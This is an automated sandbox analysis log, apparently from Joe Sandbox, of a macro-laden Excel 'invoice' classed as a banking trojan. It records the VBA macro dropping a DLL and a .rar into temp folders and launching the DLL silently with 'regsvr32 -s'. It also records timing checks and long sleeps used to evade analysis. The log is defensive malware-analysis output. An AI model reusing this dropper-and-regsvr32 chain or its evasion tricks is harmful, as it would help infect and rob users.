Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003A9E70	4_2_003A9E70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003B9E70	4_2_003B9E70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003BA660	4_2_003BA660
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003C7660	4_2_003C7660
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003C2E60	4_2_003C2E60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003C1240	4_2_003C1240
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003B8AB0	4_2_003B8AB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003C1EB0	4_2_003C1EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003C26B0	4_2_003C26B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003BAE80	4_2_003BAE80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003BB6F0	4_2_003BB6F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003B8EF0	4_2_003B8EF0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003C62F0	4_2_003C62F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003BF6E0	4_2_003BF6E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003A6AD0	4_2_003A6AD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003B96D0	4_2_003B96D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003CFA10	4_2_003CFA10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003C3EC0	4_2_003C3EC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003C1730	4_2_003C1730
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003C9B10	4_2_003C9B10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003C3B00	4_2_003C3B00
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003B5B60	4_2_003B5B60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003BBF50	4_2_003BBF50
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003BE3F0	4_2_003BE3F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003B67C8	4_2_003B67C8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003B83C0	4_2_003B83C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003B7FC0	4_2_003B7FC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_003C7FC0	4_2_003C7FC0

Source: INV8222874744_20210111490395.xlsm	OLE, VBA macro line: Private Sub view_1_a_Layout(ByVal Index As Long)
Source: VBA code instrumentation	OLE, VBA macro: Module Sheet1, Function view_1_a_Layout			Name: view_1_a_Layout

Source: INV8222874744_20210111490395.xlsm

OLE indicator, VBA macros: true

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hhsz1e0[1].rar E3F7EB34C3A1FD306C7788096CB666F3362BA5AA78710074B61DD03F829B8AFD
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\bjcbglsw.dll E3F7EB34C3A1FD306C7788096CB666F3362BA5AA78710074B61DD03F829B8AFD

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 2456

Source: DWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.bank.expl.evad.winXLSM@9/23@1/5

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$INV8222874744_20210111490395.xlsm

Jump to behavior

Source: C:\Windows\System32\DWWIN.EXE

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2288

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDAB5.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: INV8222874744_20210111490395.xlsm

ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll.
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll.
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 2456
Source: unknown	Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 2456
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll.	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 2456	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll.	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE	Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 2456	Jump to behavior

Source: C:\Windows\System32\DWWIN.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{713AACC8-3B71-435C-A3A1-BE4E53621AB1}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Automated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: INV8222874744_20210111490395.xlsm	Initial sample: OLE zip file path = xl/media/image2.png
Source: INV8222874744_20210111490395.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: INV8222874744_20210111490395.xlsm

Initial sample: OLE indicators vbamacros = False

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,

4_2_10002140

Source: unknown

Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\bjcbglsw.dll.

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000400A push esi; retf	4_2_1000401D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10010810 pushfd ; retf	4_2_1001084E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000D856 push ebp; retf	4_2_1000D85E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000E8F3 pushad ; iretd	4_2_1000E8F4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10002140 push ecx; ret	4_2_100021B6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001CD9B push esp; retf	4_2_1001CDB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000C265 push 588A19FDh; iretd	4_2_1000C278
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10020A73 push edx; iretd	4_2_10020A9C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000FEBF push eax; iretd	4_2_1000FEC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000FEFA push 00000000h; iretd	4_2_1000FF10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10023EFF push eax; iretd	4_2_10023F64
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000C304 push 588A1BCDh; iretd	4_2_1000C314
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10010307 push esp; retf	4_2_10010308
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000CF15 push 0000002Dh; iretd	4_2_1000CF1C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001DB23 push eax; iretd	4_2_1001DB34
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10020B27 push eax; iretd	4_2_10020B28
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000DFC7 pushad ; iretd	4_2_1000DFC8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10023FEB push edx; ret	4_2_10024001
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100107FB pushfd ; retf	4_2_1001084E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0025BFB0 push edx; ret	4_2_0025C269
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00227172 push dword ptr [ebp+ecx*8-49h]; retf	4_2_00227176
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002462CD pushad ; iretd	4_2_002462E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0023F6CD push esi; ret	4_2_0023F6D7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0022899D push 00000369h; ret	4_2_00228A28
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_002289CD push 00000369h; ret	4_2_00228A28
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0024FB74 push esi; ret	4_2_0024FB8B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00221D11 push FFFFFFD5h; ret	4_2_00221D18
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00220E8F push esi; ret	4_2_00220E94

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\bjcbglsw.dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hhsz1e0[1].rar			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hhsz1e0[1].rar

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_002388DD rdtsc

4_2_002388DD

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,

4_2_003A5150

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hhsz1e0[1].rar

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2488	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -501000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -798000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -780000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -644000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -795000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -426000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -730000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -718000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -123000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -131000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -173000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -308000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -264000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -652000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -284000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -648000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -488000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -241000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -552000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -620000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -332000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -755000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -296000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -531000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -678000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -556000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -668000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -996000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -640000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -324000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -168000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -510000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -257000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -720000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -625000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -770000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -276000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -157000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -459000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -358000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -496000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -534000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -283000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -280000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -536000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -423000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -301000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -684000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -411000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -1020000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -795000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -429000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -258000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -495000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -269000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -319000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -280000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -302000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -805000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -528000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -313000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -266000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -338000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -129000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -256000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -408000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -270000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -335000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -484000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -484000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -326000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -251000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -378000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -304000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -292000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -145000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -474000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -318000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -303000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -328000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -254000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -306000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -311000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -390000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -149000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2572	Thread sleep time: -294000s >= -30000s	Jump to behavior
